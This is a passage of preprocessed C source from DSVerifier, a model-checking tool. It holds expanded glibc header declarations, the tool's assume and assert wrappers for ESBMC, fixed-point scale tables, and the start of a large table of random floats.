size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qecvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qfcvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int mblen (const char *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int mbtowc (wchar_t *__restrict __pwc,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int wctomb (char *__s, wchar_t __wchar) __attribute__ ((__nothrow__ , __leaf__));
extern size_t mbstowcs (wchar_t *__restrict __pwcs,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern size_t wcstombs (char *__restrict __s,
const wchar_t *__restrict __pwcs, size_t __n)
__attribute__ ((__nothrow__ , __leaf__));
extern int rpmatch (const char *__response) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 957 "/usr/include/stdlib.h" 3 4
extern int getsubopt (char **__restrict __optionp,
char *const *__restrict __tokens,
char **__restrict __valuep)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2, 3))) ;
# 1003 "/usr/include/stdlib.h" 3 4
extern int getloadavg (double __loadavg[], int __nelem)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 1013 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 1 3 4
# 1014 "/usr/include/stdlib.h" 2 3 4
# 1023 "/usr/include/stdlib.h" 3 4
# 18 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 66 "/usr/include/assert.h" 3 4
extern void __assert_fail (const char *__assertion, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert_perror_fail (int __errnum, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert (const char *__assertion, const char *__file, int __line)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/stdio.h" 1 3 4
# 27 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 28 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 34 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 1 3 4
# 40 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 3 4
typedef __builtin_va_list __gnuc_va_list;
# 37 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 1 3 4
# 13 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 3 4
typedef struct
{
int __count;
union
{
unsigned int __wch;
char __wchb[4];
} __value;
} __mbstate_t;
# 6 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 2 3 4
typedef struct _G_fpos_t
{
__off_t __pos;
__mbstate_t __state;
} __fpos_t;
# 40 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 3 4
typedef struct _G_fpos64_t
{
__off64_t __pos;
__mbstate_t __state;
} __fpos64_t;
# 41 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE __FILE;
# 42 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE FILE;
# 43 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 3 4
struct _IO_FILE;
struct _IO_marker;
struct _IO_codecvt;
struct _IO_wide_data;
typedef void _IO_lock_t;
struct _IO_FILE
{
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
char *_IO_save_base;
char *_IO_backup_base;
char *_IO_save_end;
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset;
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
__off64_t _offset;
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
# 44 "/usr/include/stdio.h" 2 3 4
# 52 "/usr/include/stdio.h" 3 4
typedef __gnuc_va_list va_list;
# 84 "/usr/include/stdio.h" 3 4
typedef __fpos_t fpos_t;
# 133 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h" 1 3 4
# 134 "/usr/include/stdio.h" 2 3 4
extern FILE *stdin;
extern FILE *stdout;
extern FILE *stderr;
extern int remove (const char *__filename) __attribute__ ((__nothrow__ , __leaf__));
extern int rename (const char *__old, const char *__new) __attribute__ ((__nothrow__ , __leaf__));
extern int renameat (int __oldfd, const char *__old, int __newfd,
const char *__new) __attribute__ ((__nothrow__ , __leaf__));
# 173 "/usr/include/stdio.h" 3 4
extern FILE *tmpfile (void) ;
# 187 "/usr/include/stdio.h" 3 4
extern char *tmpnam (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
# 204 "/usr/include/stdio.h" 3 4
extern char *tempnam (const char *__dir, const char *__pfx)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) ;
extern int fclose (FILE *__stream);
extern int fflush (FILE *__stream);
# 227 "/usr/include/stdio.h" 3 4
extern int fflush_unlocked (FILE *__stream);
# 246 "/usr/include/stdio.h" 3 4
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) ;
extern FILE *freopen (const char *__restrict __filename,
const char *__restrict __modes,
FILE *__restrict __stream) ;
# 279 "/usr/include/stdio.h" 3 4
extern FILE *fdopen (int __fd, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ;
# 292 "/usr/include/stdio.h" 3 4
extern FILE *fmemopen (void *__s, size_t __len, const char *__modes)
__attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *open_memstream (char **__bufloc, size_t *__sizeloc) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void setbuf (FILE *__restrict __stream, char *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__));
extern int setvbuf (FILE *__restrict __stream, char *__restrict __buf,
int __modes, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern void setbuffer (FILE *__restrict __stream, char *__restrict __buf,
size_t __size) __attribute__ ((__nothrow__ , __leaf__));
extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
extern int printf (const char *__restrict __format, ...);
extern int sprintf (char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__));
extern int vfprintf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg);
extern int vprintf (const char *__restrict __format, __gnuc_va_list __arg);
extern int vsprintf (char *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg) __attribute__ ((__nothrow__));
extern int snprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 4)));
extern int vsnprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 0)));
# 379 "/usr/include/stdio.h" 3 4
extern int vdprintf (int __fd, const char *__restrict __fmt,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__printf__, 2, 0)));
extern int dprintf (int __fd, const char *__restrict __fmt, ...)
__attribute__ ((__format__ (__printf__, 2, 3)));
extern int fscanf (FILE *__restrict __stream,
const char *__restrict __format, ...) ;
extern int scanf (const char *__restrict __format, ...) ;
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) __asm__ ("" "__isoc99_fscanf")
;
extern int scanf (const char *__restrict __format, ...) __asm__ ("" "__isoc99_scanf")
;
extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __asm__ ("" "__isoc99_sscanf") __attribute__ ((__nothrow__ , __leaf__))
;
# 432 "/usr/include/stdio.h" 3 4
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0)));
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vfscanf")
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vscanf")
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vsscanf") __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__format__ (__scanf__, 2, 0)));
# 485 "/usr/include/stdio.h" 3 4
extern int fgetc (FILE *__stream);
extern int getc (FILE *__stream);
extern int getchar (void);
extern int getc_unlocked (FILE *__stream);
extern int getchar_unlocked (void);
# 510 "/usr/include/stdio.h" 3 4
extern int fgetc_unlocked (FILE *__stream);
# 521 "/usr/include/stdio.h" 3 4
extern int fputc (int __c, FILE *__stream);
extern int putc (int __c, FILE *__stream);
extern int putchar (int __c);
# 537 "/usr/include/stdio.h" 3 4
extern int fputc_unlocked (int __c, FILE *__stream);
extern int putc_unlocked (int __c, FILE *__stream);
extern int putchar_unlocked (int __c);
extern int getw (FILE *__stream);
extern int putw (int __w, FILE *__stream);
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream)
;
# 603 "/usr/include/stdio.h" 3 4
extern __ssize_t __getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getline (char **__restrict __lineptr,
size_t *__restrict __n,
FILE *__restrict __stream) ;
extern int fputs (const char *__restrict __s, FILE *__restrict __stream);
extern int puts (const char *__s);
extern int ungetc (int __c, FILE *__stream);
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __s);
# 673 "/usr/include/stdio.h" 3 4
extern size_t fread_unlocked (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite_unlocked (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream);
extern int fseek (FILE *__stream, long int __off, int __whence);
extern long int ftell (FILE *__stream) ;
extern void rewind (FILE *__stream);
# 707 "/usr/include/stdio.h" 3 4
extern int fseeko (FILE *__stream, __off_t __off, int __whence);
extern __off_t ftello (FILE *__stream) ;
# 731 "/usr/include/stdio.h" 3 4
extern int fgetpos (FILE *__restrict __stream, fpos_t *__restrict __pos);
extern int fsetpos (FILE *__stream, const fpos_t *__pos);
# 757 "/usr/include/stdio.h" 3 4
extern void clearerr (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void clearerr_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void perror (const char *__s);
# 1 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 1 3 4
# 26 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 3 4
extern int sys_nerr;
extern const char *const sys_errlist[];
# 782 "/usr/include/stdio.h" 2 3 4
extern int fileno (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int fileno_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
# 800 "/usr/include/stdio.h" 3 4
extern FILE *popen (const char *__command, const char *__modes) ;
extern int pclose (FILE *__stream);
extern char *ctermid (char *__s) __attribute__ ((__nothrow__ , __leaf__));
# 840 "/usr/include/stdio.h" 3 4
extern void flockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int ftrylockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
# 858 "/usr/include/stdio.h" 3 4
extern int __uflow (FILE *);
extern int __overflow (FILE *, int);
# 873 "/usr/include/stdio.h" 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
void __DSVERIFIER_assume(_Bool expression){
__ESBMC_assume(expression);
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
}
void __DSVERIFIER_assert(_Bool expression){
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 36, __extension__ __PRETTY_FUNCTION__); }))
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
void __DSVERIFIER_assert_msg(_Bool expression, char * msg){
printf("%s", msg);
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 41, __extension__ __PRETTY_FUNCTION__); }))
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
# 22 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 1
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 1 3 4
# 9 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 3 4
# 1 "/usr/include/stdint.h" 1 3 4
# 26 "/usr/include/stdint.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 27 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wchar.h" 1 3 4
# 29 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 30 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
typedef __uint8_t uint8_t;
typedef __uint16_t uint16_t;
typedef __uint32_t uint32_t;
typedef __uint64_t uint64_t;
# 38 "/usr/include/stdint.h" 2 3 4
typedef __int_least8_t int_least8_t;
typedef __int_least16_t int_least16_t;
typedef __int_least32_t int_least32_t;
typedef __int_least64_t int_least64_t;
typedef __uint_least8_t uint_least8_t;
typedef __uint_least16_t uint_least16_t;
typedef __uint_least32_t uint_least32_t;
typedef __uint_least64_t uint_least64_t;
typedef signed char int_fast8_t;
typedef long int int_fast16_t;
typedef long int int_fast32_t;
typedef long int int_fast64_t;
# 71 "/usr/include/stdint.h" 3 4
typedef unsigned char uint_fast8_t;
typedef unsigned long int uint_fast16_t;
typedef unsigned long int uint_fast32_t;
typedef unsigned long int uint_fast64_t;
# 87 "/usr/include/stdint.h" 3 4
typedef long int intptr_t;
typedef unsigned long int uintptr_t;
# 101 "/usr/include/stdint.h" 3 4
typedef __intmax_t intmax_t;
typedef __uintmax_t uintmax_t;
# 10 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 2 3 4
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 1 "/usr/include/inttypes.h" 1 3 4
# 34 "/usr/include/inttypes.h" 3 4
typedef int __gwchar_t;
# 266 "/usr/include/inttypes.h" 3 4
typedef struct
{
long int quot;
long int rem;
} imaxdiv_t;
# 290 "/usr/include/inttypes.h" 3 4
extern intmax_t imaxabs (intmax_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern imaxdiv_t imaxdiv (intmax_t __numer, intmax_t __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern intmax_t strtoimax (const char *__restrict __nptr,
char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t strtoumax (const char *__restrict __nptr,
char ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern intmax_t wcstoimax (const __gwchar_t *__restrict __nptr,
__gwchar_t **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t wcstoumax (const __gwchar_t *__restrict __nptr,
__gwchar_t ** __restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
# 432 "/usr/include/inttypes.h" 3 4
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
extern implementation impl;
typedef int64_t fxp_t;
fxp_t _fxp_one;
fxp_t _fxp_half;
fxp_t _fxp_minus_one;
fxp_t _fxp_min;
fxp_t _fxp_max;
double _dbl_max;
double _dbl_min;
fxp_t _fxp_fmask;
fxp_t _fxp_imask;
static const double scale_factor[31] = { 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0,
128.0, 256.0, 512.0, 1024.0, 2048.0, 4096.0, 8192.0, 16384.0, 32768.0,
65536.0, 131072.0, 262144.0, 524288.0, 1048576.0, 2097152.0, 4194304.0,
8388608.0, 16777216.0, 33554432.0, 67108864.0, 134217728.0,
268435456.0, 536870912.0, 1073741824.0 };
static const double scale_factor_inv[31] = { 1.0, 0.5, 0.25, 0.125, 0.0625,
0.03125, 0.015625, 0.0078125, 0.00390625, 0.001953125, 0.0009765625,
0.00048828125, 0.000244140625, 0.0001220703125, 0.00006103515625,
0.000030517578125, 0.000015258789063, 0.000007629394531,
0.000003814697266, 0.000001907348633, 0.000000953674316,
0.000000476837158, 0.000000238418579, 0.000000119209290,
0.000000059604645, 0.000000029802322, 0.000000014901161,
0.000000007450581, 0.000000003725290, 0.000000001862645,
0.000000000931323 };
static const float rand_uni[10000] = { -0.486240329978498f, -0.0886462298529236f, -0.140307596103306f, 0.301096597450952f, 0.0993171079928659f, 0.971751769763271f, 0.985173975730828f, 0.555993645184930f, 0.582088652691427f, -0.153377496651175f, 0.383610009058905f, -0.335724126391271f, 0.978768141636516f, -0.276250018648572f, 0.390075705739569f, -0.179022404038782f, 0.690083827115783f, -0.872530132490992f, -0.970585763293203f, -0.581476053441704f, -0.532614615674888f, -0.239699306693312f, -0.678183014035494f, 0.349502640932782f, -0.210469890686263f, 0.841262085391842f, -0.473585465151401f, 0.659383565443701f, -0.651160036945754f, -0.961043527561335f, -0.0814927639199137f, 0.621303110569702f, -0.784529166943541f, 0.0238464770757800f, 0.392694728594110f, 0.776848735202001f, 0.0870059709310509f, 0.880563655271790f, 0.883457036977564f, -0.249235082877382f, -0.691040749216870f, 0.578731120064320f, -0.973932858000832f, -0.117699105431720f, -0.723831748151088f, -0.483149657477524f, -0.821277691383664f, -0.459725618100875f, 0.148175952221864f, 0.444306875534854f, -0.325610376336498f, 0.544142311404910f, -0.165319440455435f, 0.136706800705517f, 0.543312481350682f, 0.467210959764607f, -0.349266618228534f, -0.660110730565862f, 0.910332331495431f, 0.961049802789367f, -0.786168905164629f, 0.305648402726554f, 0.510815258508885f, 0.0950733260984060f, 0.173750645487898f, 0.144488668408672f, 0.0190031984466126f, -0.299194577636724f, 0.302411647442273f, -0.730462524226212f, 0.688646006554796f, 0.134948379722118f, 0.533716723458894f, -0.00226300779660438f, -0.561340777806718f, 0.450396313744017f, -0.569445876566955f, 0.954155246557698f, -0.255403882430676f, -0.759820984120828f, -0.855279790307514f, -0.147352581758156f, -0.302269055643746f, -0.642038024364086f, -0.367405981107491f, 0.491844011712164f, -0.542191710121194f, -0.938294043323732f, 0.683979894338020f, 0.294728290855287f, 0.00662691839443919f, -0.931040350582855f, 0.152356209974418f, 0.678620860551457f, -0.534989269238408f, 0.932096367913226f, -0.0361062818028513f, -0.847189697149530f, -0.975903030160255f, 0.623293205784014f, -0.661289688031659f, 0.724486055119603f, 0.307504095172835f, 0.00739266163731767f, -0.393681596442097f, 0.0313739422974388f, 0.0768157689673350f, -0.652063346886817f, 0.864188030044388f, -0.588932092781034f, 0.496015896758580f, -0.872858269231211f, 0.978780599551039f, -0.504887732991147f, -0.462378791937628f, 0.0141726829338038f, 0.769610007653591f, 0.945233033188923f, -0.782235375325016f, -0.832206533738799f, 0.745634368088673f, -0.696969510157151f, -0.0674631869948374f, -0.123186450806584f, -0.359158959141949f, -0.393882649464391f, 0.441371446689899f, -0.829394270569736f, -0.301502651277431f, -0.996215501187289f, 0.934634037393066f, -0.282431114746289f, -0.927550795619590f, -0.437037530043415f, -0.360426812995980f, 0.949549724575862f, 0.502784616197919f, 0.800771681422909f, -0.511398929004089f, 0.309288504642554f, -0.207261227890933f, 0.930587995125773f, -0.777029876696670f, -0.489329175755640f, -0.134595132329858f, 0.285771358983518f, 0.182331373854387f, -0.544110494560697f, 0.278439882883985f, -0.556325158102182f, 0.579043806545889f, 0.134648133801916f, 0.602850725479294f, -0.151663563868883f, 0.180694361855878f, -0.651591295315595f, 0.281129147768056f, -0.580047306475484f, 0.687883075491433f, 0.279398670804288f, -0.853428128249503f, -0.532609367372680f, -0.821156786377917f, -0.181273229058573f, -0.983898569846882f, -0.0964374318311501f, 0.880923372124250f, 0.102643371392389f, 0.893615387135596f, -0.259276649383649f, 0.699287743639363f, 0.402940604635828f, -0.110721596226581f, 0.0846246472582877f, 0.820733021865405f, 0.795578903285308f, -0.495144122011537f, 0.273150029257472f, -0.268249949701437f, 0.231982193341980f, 0.694211299124074f, 0.859950868718233f, 0.959483382623794f, -0.422972626833543f, -0.109621798738360f, 0.433094703426531f, 0.694025903378851f, 0.374478987547435f, -0.293668545105608f, -0.396213864190828f, -0.0632095887099047f, -0.0285139536748673f, 0.831794132192390f, -0.548543088139238f, 0.791869201724680f, 0.325211484201845f, 0.155274810721772f, -0.112383643064821f, -0.674403070297721f, 0.642801068229810f, -0.615712048835242f, -0.322576771285566f, -0.409336818836595f, 0.548069973193770f, -0.386353709407947f, -0.0741664985357784f, 0.619639599324983f, -0.815703814931314f, 0.965550307223862f, 0.623407852683828f, -0.789634372832984f, 0.736750050047572f, -0.0269443926793700f, 0.00545706093721488f, -0.315712479832091f, -0.890110021644720f, -0.869390443173846f, -0.381538869981866f, -0.109498998005949f, 0.131433952330613f, -0.233452413139316f, 0.660289822785465f, 0.543381186340023f, -0.384712418750451f, -0.913477554164890f, 0.767102957655267f, -0.115129944521936f, -0.741161985822647f, -0.0604180020782450f, -0.819131535144059f, -0.409539679760029f, 0.574419252943637f, -0.0440704617157433f, 0.933173744590532f, 0.261360623390448f, -0.880290575543046f, 0.329806293425492f, 0.548915621667952f, 0.635187167795234f, -0.611034070318967f, 0.458196727901944f, 0.397377226781023f, 0.711941361933987f, 0.782147744383368f, -0.00300685339552631f, 0.384687233450957f, 0.810102466029521f, 0.452919847968424f, -0.183164257016897f, -0.755603185485427f, -0.604334477365858f, -0.786222413488860f, -0.434887500763099f, -0.678845635625581f, -0.381200370488331f, -0.582350534916068f, -0.0444427346996734f, 0.116237247526397f, -0.364680921206275f, -0.829395404347498f, -0.258574590032613f, -0.910082114298859f, 0.501356900925997f, 0.0295361922006900f, -0.471786618165219f, 0.536352925101547f, -0.316120662284464f, -0.168902841718737f, 0.970850119987976f, -0.813818666854395f, -0.0861183123848732f, 0.866784827877161f, 0.535966478165739f, -0.806958669103425f, -0.627307415616045f, -0.686618354673079f, 0.0239165685193152f, 0.525427699287402f, 0.834079334357391f, -0.527333932295852f, 0.130970034225907f, -0.790218350377199f, 0.399338640441987f, 0.133591886379939f, -0.181354311053254f, 0.420121912637914f, -0.625002202728601f, -0.293296669160307f, 0.0113819513424340f, -0.882382002895096f, -0.883750159690028f, 0.441583656876336f, -0.439054135454480f, 0.873049498123622f, 0.660844523562817f, 0.0104240153103699f, 0.611420248331623f, -0.235926309432748f, 0.207317724918460f, 0.884691834560657f, 0.128302402592277f, -0.283754448219060f, 0.237649901255856f, 0.610200763264703f, -0.625035441247926f, -0.964609592118695f, -0.323146562743113f, 0.961529402270719f, -0.793576233735450f, -0.843916713821003f, 0.314105102728384f, -0.204535560653294f, 0.753318789613803f, 0.160678386635821f, -0.647065919861379f, -0.202789866826280f, 0.648108234268198f, -0.261292621025902f, 0.156681828732770f, 0.405377351820066f, 0.228465381497500f, 0.972348516671163f, 0.288346037401522f, -0.0799068604307178f, 0.916939290109587f, -0.279220972402209f, -0.203447523864279f, -0.533640046855273f, 0.543561961674653f, 0.880711097286889f, -0.549683064687774f, 0.0130107219236368f, -0.554838164576024f, -0.379442406201385f, -0.00500104610043062f, 0.409530122826868f, -0.580423080726061f, 